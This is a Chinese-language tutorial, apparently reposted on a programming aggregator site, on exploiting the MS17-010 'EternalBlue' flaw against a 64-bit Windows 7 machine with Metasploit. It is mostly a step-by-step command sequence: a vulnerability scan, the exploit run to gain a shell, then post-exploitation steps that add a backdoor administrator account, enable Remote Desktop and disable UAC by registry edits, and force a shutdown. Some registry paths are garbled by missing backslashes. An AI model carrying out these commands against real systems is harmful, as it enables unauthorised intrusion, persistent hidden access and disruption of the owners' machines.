概述
这里是接着之前一篇"利用MS17-010渗透win7(32位)"的姊妹篇,想了解win7(32位)如何利用永恒之蓝渗透的请点击利用MS17-010渗透win7(32位)
Win7x64的渗透,我们就可以不用下载利用模块了,kali里已经帮你集成好了 我这里的攻击机(192.168.1.222),靶机(192.168.1.111),记得靶机关闭防火墙渗透流程
权限提升利用
渗透流程:
1.运行postgresql 数据库
root@kali:~# service postgresql start
2.打开msf
root@kali:~# msfconsole
3.扫描靶机系统是否存在漏洞
- 使用模块:
msf > use auxiliary/scanner/smb/smb_ms17_010
- 查看配置信息:
msf auxiliary(scanner/smb/smb_ms17_010) > show options
- 设置目标IP
set rhost 192.168.1.111
- 进行扫描:
msf auxiliary(scanner/smb/smb_ms17_010) > run
发现目标系统存在“永恒之蓝”漏洞
3.搜索ms17-010漏洞利用模块
msf > search ms17-010
4.use模块
msf > use exploit/windows/smb/ms17_010_eternalblue
5.查看需要配置的信息
msf exploit(windows/smb/ms17_010_eternalblue) > show options
6.set 靶机(rhost) IP,这里不需要使用反弹shell模块
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.111
7.exploit或run,成功拿到shell
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
权限提升利用:
(1)创建用户,加至管理组
C:Windowssystem32>net user 1stPeak 123456 /add
C:Windowssystem32>net localgroup administrators 1stPeak /add
我们去靶机上看看:
(2)打开远程桌面服务
C:Windowssystem32>REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
(3)使用添加的管理员账户1stPeak进行远程桌面
root@kali:~# rdesktop 192.168.1.111:3389
- 比较麻烦的是远程桌面,必须要当前登陆用户同意或者默认不选择30s才可以
- 我想过关闭UAC,但是无效
关闭UAC cmd:
reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f
开启UAC cmd:
reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 1 /f
没有找到cmd命令开启多用户连接远程桌面,因此,远程桌面利用条件也只有:
(1)对方没有看到自己桌面被连接信息
(2)对方已经使用可以多个用户同时登陆远程桌面
补充一下开启多个用户登陆远程桌面的简单方法:
打开本地组策略编辑器,依次展开
【计算机配置】-【管理模板】-【Windows组件】-【远程桌面服务】-【远程桌面会话主机】-【连接】-【标准】双击【限制连接的数量】
(4)如果你单纯想露一手,就关机或者重启吧(目前这个看运气,有一定几率会出现执行失败)
60s后关机
shutdown -s -t 60
60s后重启
shutdown -r -t 60
取消关机或重启
shutdown -a
最后
以上就是搞怪蚂蚁为你收集整理的利用MS17-010渗透win7(64位)的全部内容,希望文章能够帮你解决利用MS17-010渗透win7(64位)所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复